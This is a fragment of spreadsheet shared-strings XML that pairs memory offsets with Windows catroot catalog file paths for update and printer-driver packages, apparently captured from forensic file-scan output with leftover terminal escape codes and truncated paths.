    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3109560~31bf385</t>
  </si>
  <si>
    <t>0xdf70f878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3109103_SP1~31b</t>
  </si>
  <si>
    <t>0xdf70fb90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3108664~31bf385</t>
  </si>
  <si>
    <t>0xdf70fee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3108381~31bf385</t>
  </si>
  <si>
    <t>0xdf710288</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3122648~31bf385</t>
  </si>
  <si>
    <t>0xdf7103c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3126587_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7105a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3122648_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7108b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3115858_SP1~31b</t>
  </si>
  <si>
    <t>0xdf710bd0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3110329~31bf385</t>
  </si>
  <si>
    <t>0xdf710d10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3115858~31bf385</t>
  </si>
  <si>
    <t>0xdf710ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3110329_SP1~31b</t>
  </si>
  <si>
    <t>0xdf711180</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3137061~31bf385</t>
  </si>
  <si>
    <t>0xdf711358</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3133977_SP1~31b</t>
  </si>
  <si>
    <t>0xdf711498</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3127220_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7117b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3126587~31bf385</t>
  </si>
  <si>
    <t>0xdf7118f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3133977_RTM~31b</t>
  </si>
  <si>
    <t>0xdf711c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3124275~31bf385</t>
  </si>
  <si>
    <t>0xdf711ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3124275_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7121c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3138378_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7123c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3138612~31bf385</t>
  </si>
  <si>
    <t>0xdf7125a0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3137061_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7128b8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3137061_RTM~31b</t>
  </si>
  <si>
    <t>0xdf712b68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3133977~31bf385</t>
  </si>
  <si>
    <t>0xdf712dd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3127220~31bf385</t>
  </si>
  <si>
    <t>0xdf7131c0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3139398_RTM~31b</t>
  </si>
  <si>
    <t>0xdf7134d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3138910~31bf385</t>
  </si>
  <si>
    <t>0xdf713618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3139398~31bf385</t>
  </si>
  <si>
    <t>0xdf713950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3138910_SP1~31b</t>
  </si>
  <si>
    <t>0xdf713b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3138612_SP1~31b</t>
  </si>
  <si>
    <t>0xdf713e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3138378~31bf385</t>
  </si>
  <si>
    <t>0xdf7141e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3147071_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7144f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3140245_SP1~31b</t>
  </si>
  <si>
    <t>0xdf714810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3139914~31bf385</t>
  </si>
  <si>
    <t>0xdf714950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3140245~31bf385</t>
  </si>
  <si>
    <t>0xdf714b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3139914_SP1~31b</t>
  </si>
  <si>
    <t>0xdf714ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3139398_SP1~31b</t>
  </si>
  <si>
    <t>0xdf715118</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3155178_SP1~31b</t>
  </si>
  <si>
    <t>0xdf715430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3150513~31bf385</t>
  </si>
  <si>
    <t>0xdf715810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3150220~31bf385</t>
  </si>
  <si>
    <t>0xdf715950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3156016~31bf385</t>
  </si>
  <si>
    <t>0xdf715b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3150220_SP1~31b</t>
  </si>
  <si>
    <t>0xdf715e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3147071~31bf385</t>
  </si>
  <si>
    <t>0xdf715f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3150513_SP1~31b</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[137G</t>
  </si>
  <si>
    <t>0xdf7161b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3159398_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7164c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3156019~31bf385</t>
  </si>
  <si>
    <t>0xdf7167e0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3156019_SP1~31b</t>
  </si>
  <si>
    <t>0xdf716b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3156016_SP1~31b</t>
  </si>
  <si>
    <t>0xdf716e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3155178~31bf385</t>
  </si>
  <si>
    <t>0xdf716f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3159398~31bf385</t>
  </si>
  <si>
    <t>0xdf7170f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3161958~31bf385</t>
  </si>
  <si>
    <t>0xdf7174d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3161949~31bf385</t>
  </si>
  <si>
    <t>0xdf717618</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3172605_SP1~31b</t>
  </si>
  <si>
    <t>0xdf7177f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3161949_SP1~31b</t>
  </si>
  <si>
    <t>0xdf717b08</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3161102~31bf385</t>
  </si>
  <si>
    <t>0xdf717c48</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3161958_SP1~31b</t>
  </si>
  <si>
    <t>0xdf717e20</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3161102_SP1~31b</t>
  </si>
  <si>
    <t>0xdf718158</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3177467_SP1~31b</t>
  </si>
  <si>
    <t>0xdf718470</t>
  </si>
  <si>
    <t>0xdf7185b0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3177467~31bf385</t>
  </si>
  <si>
    <t>0xdf718788</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3172605~31bf385</t>
  </si>
  <si>
    <t>0xdf718ac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3170735~31bf385</t>
  </si>
  <si>
    <t>0xdf718dd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3170735_SP1~31b</t>
  </si>
  <si>
    <t>0xdf719258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3184143~31bf385</t>
  </si>
  <si>
    <t>0xdf719430</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3184143_RTM~31b</t>
  </si>
  <si>
    <t>0xdf719748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3179573~31bf385</t>
  </si>
  <si>
    <t>0xdf719a60</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3179573_SP1~31b</t>
  </si>
  <si>
    <t>0xdf719c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB3184143_SP1~31b</t>
  </si>
  <si>
    <t>0xdf719e40</t>
  </si>
  <si>
    <t>0xdf71a3c8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4054518_RTM~31b</t>
  </si>
  <si>
    <t>0xdf71a5d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4483187~31bf385</t>
  </si>
  <si>
    <t>~~11.2.1.0.</t>
  </si>
  <si>
    <t>0xdf71a7a8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4040980_SP1~31b</t>
  </si>
  <si>
    <t>0xdf71aac0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4019990~31bf385</t>
  </si>
  <si>
    <t>0xdf71add8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4019990_RTM~31b</t>
  </si>
  <si>
    <t>0xdf71af18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4040980~31bf385</t>
  </si>
  <si>
    <t>0xdf71b028</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4054518_SP1~31b</t>
  </si>
  <si>
    <t>0xdf71b0f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4486563_SP1~31b</t>
  </si>
  <si>
    <t>0xdf71b410</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4486563_RTM~31b</t>
  </si>
  <si>
    <t>0xdf71b728</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4483458~31bf385</t>
  </si>
  <si>
    <t>0xdf71b868</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB958488~31bf3856</t>
  </si>
  <si>
    <t>ad364e35~x86~</t>
  </si>
  <si>
    <t>~6.2.7600.1</t>
  </si>
  <si>
    <t>6513.c</t>
  </si>
  <si>
    <t>0xdf71bba0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4483458_SP1~31b</t>
  </si>
  <si>
    <t>0xdf71bd78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB4483187_RTM~31b</t>
  </si>
  <si>
    <t>~x86~~11.2.</t>
  </si>
  <si>
    <t>1.0.ca</t>
  </si>
  <si>
    <t>0xdf71c0f8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976902_RTM~31bf</t>
  </si>
  <si>
    <t>cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf71c2d0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976422_RTM~31bf</t>
  </si>
  <si>
    <t>0xdf71c5e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB971468~31bf3856</t>
  </si>
  <si>
    <t>~6.1.1.0.ca</t>
  </si>
  <si>
    <t>0xdf71c900</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB971468_RTM~31bf</t>
  </si>
  <si>
    <t>0xdf71c9d8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976902~31bf3856</t>
  </si>
  <si>
    <t>~6.1.1.1751</t>
  </si>
  <si>
    <t>0xdf71cb18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976933~31bf3856</t>
  </si>
  <si>
    <t>bg-BG~6.1.7</t>
  </si>
  <si>
    <t>514.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf71cf18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976422~31bf3856</t>
  </si>
  <si>
    <t>0xdf71d128</t>
  </si>
  <si>
    <t>fr-FR~6.1.7</t>
  </si>
  <si>
    <t>0xdf71d300</t>
  </si>
  <si>
    <t>da-DK~6.1.7</t>
  </si>
  <si>
    <t>0xdf71d618</t>
  </si>
  <si>
    <t>cs-CZ~6.1.7</t>
  </si>
  <si>
    <t>0xdf71d9f8</t>
  </si>
  <si>
    <t>ar-SA~6.1.7</t>
  </si>
  <si>
    <t>0xdf71db38</t>
  </si>
  <si>
    <t>en-US~6.1.7</t>
  </si>
  <si>
    <t>0xdf71dd10</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB976932~31bf3856</t>
  </si>
  <si>
    <t>0xdf71e358</t>
  </si>
  <si>
    <t>fi-FI~6.1.7</t>
  </si>
  <si>
    <t>0xdf71e670</t>
  </si>
  <si>
    <t>et-EE~6.1.7</t>
  </si>
  <si>
    <t>0xdf71e988</t>
  </si>
  <si>
    <t>es-ES~6.1.7</t>
  </si>
  <si>
    <t>0xdf71ecd0</t>
  </si>
  <si>
    <t>el-GR~6.1.7</t>
  </si>
  <si>
    <t>0xdf71ef80</t>
  </si>
  <si>
    <t>de-DE~6.1.7</t>
  </si>
  <si>
    <t>0xdf71f028</t>
  </si>
  <si>
    <t>he-IL~6.1.7</t>
  </si>
  <si>
    <t>0xdf71f300</t>
  </si>
  <si>
    <t>ko-KR~6.1.7</t>
  </si>
  <si>
    <t>0xdf71f508</t>
  </si>
  <si>
    <t>nb-NO~6.1.7</t>
  </si>
  <si>
    <t>0xdf71f6e0</t>
  </si>
  <si>
    <t>it-IT~6.1.7</t>
  </si>
  <si>
    <t>0xdf71f9f8</t>
  </si>
  <si>
    <t>hu-HU~6.1.7</t>
  </si>
  <si>
    <t>0xdf71fd10</t>
  </si>
  <si>
    <t>hr-HR~6.1.7</t>
  </si>
  <si>
    <t>0xdf71fe50</t>
  </si>
  <si>
    <t>ja-JP~6.1.7</t>
  </si>
  <si>
    <t>0xdf720320</t>
  </si>
  <si>
    <t>pt-BR~6.1.7</t>
  </si>
  <si>
    <t>0xdf720638</t>
  </si>
  <si>
    <t>pl-PL~6.1.7</t>
  </si>
  <si>
    <t>0xdf720778</t>
  </si>
  <si>
    <t>ro-RO~6.1.7</t>
  </si>
  <si>
    <t>0xdf720950</t>
  </si>
  <si>
    <t>nl-NL~6.1.7</t>
  </si>
  <si>
    <t>0xdf720c68</t>
  </si>
  <si>
    <t>lv-LV~6.1.7</t>
  </si>
  <si>
    <t>0xdf720f80</t>
  </si>
  <si>
    <t>lt-LT~6.1.7</t>
  </si>
  <si>
    <t>0xdf721400</t>
  </si>
  <si>
    <t>sv-SE~6.1.7</t>
  </si>
  <si>
    <t>0xdf7215d8</t>
  </si>
  <si>
    <t>sl-SI~6.1.7</t>
  </si>
  <si>
    <t>0xdf7218f0</t>
  </si>
  <si>
    <t>sk-SK~6.1.7</t>
  </si>
  <si>
    <t>0xdf721c08</t>
  </si>
  <si>
    <t>ru-RU~6.1.7</t>
  </si>
  <si>
    <t>0xdf721e10</t>
  </si>
  <si>
    <t>sr-LATN-CS~</t>
  </si>
  <si>
    <t>0xdf721f80</t>
  </si>
  <si>
    <t>pt-PT~6.1.7</t>
  </si>
  <si>
    <t>0xdf722258</t>
  </si>
  <si>
    <t>zh-TW~6.1.7</t>
  </si>
  <si>
    <t>0xdf722398</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB978601~31bf3856</t>
  </si>
  <si>
    <t>~6.1.1.1.ca</t>
  </si>
  <si>
    <t>0xdf722570</t>
  </si>
  <si>
    <t>zh-HK~6.1.7</t>
  </si>
  <si>
    <t>0xdf722950</t>
  </si>
  <si>
    <t>uk-UA~6.1.7</t>
  </si>
  <si>
    <t>0xdf722c68</t>
  </si>
  <si>
    <t>tr-TR~6.1.7</t>
  </si>
  <si>
    <t>0xdf722da8</t>
  </si>
  <si>
    <t>zh-CN~6.1.7</t>
  </si>
  <si>
    <t>0xdf722f80</t>
  </si>
  <si>
    <t>th-TH~6.1.7</t>
  </si>
  <si>
    <t>0xdf7232f0</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB982018_RTM~31bf</t>
  </si>
  <si>
    <t>0xdf723608</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB979309~31bf3856</t>
  </si>
  <si>
    <t>0xdf723748</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB982018_SP1~31bf</t>
  </si>
  <si>
    <t>0xdf723920</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB979309_RTM~31bf</t>
  </si>
  <si>
    <t>0xdf723c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB978601_RTM~31bf</t>
  </si>
  <si>
    <t>0xdf723ee8</t>
  </si>
  <si>
    <t>7514.c</t>
  </si>
  <si>
    <t>0xdf724258</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf724638</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr002.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf724950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_RollupFix~31bf385</t>
  </si>
  <si>
    <t>~~7601.2435</t>
  </si>
  <si>
    <t>6.1.4.</t>
  </si>
  <si>
    <t>0xdf724a90</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf724c68</t>
  </si>
  <si>
    <t>~~7601.2396</t>
  </si>
  <si>
    <t>4.1.2.</t>
  </si>
  <si>
    <t>0xdf724f80</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB982018~31bf3856</t>
  </si>
  <si>
    <t>~6.1.3.2.ca</t>
  </si>
  <si>
    <t>0xdf725248</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr00a.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf725388</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf725560</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr009.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf725878</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr008.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf725c38</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr006.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf725d78</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr007.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf725ee8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnbr005.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf726138</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00f.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf726450</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00e.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf726810</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00c.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf726b28</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00b.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf726c68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00d.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf726e40</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00a.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72af80</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\CmBatt.sys_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72b3e8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00y.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72b528</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00z.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72b700</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00x.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72ba18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00i.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72bdd8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00g.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72bf18</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnca00h.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72c278</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00b.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72c590</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00a.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72c778</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep00d.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72c950</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep004.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72cc68</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep003.cat_x001B_[0K</t>
  </si>
  <si>
    <t>0xdf72cda8</t>
  </si>
  <si>
    <t>\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\prnep005.cat_x001B_[0K</t>
  </si>
  <si>
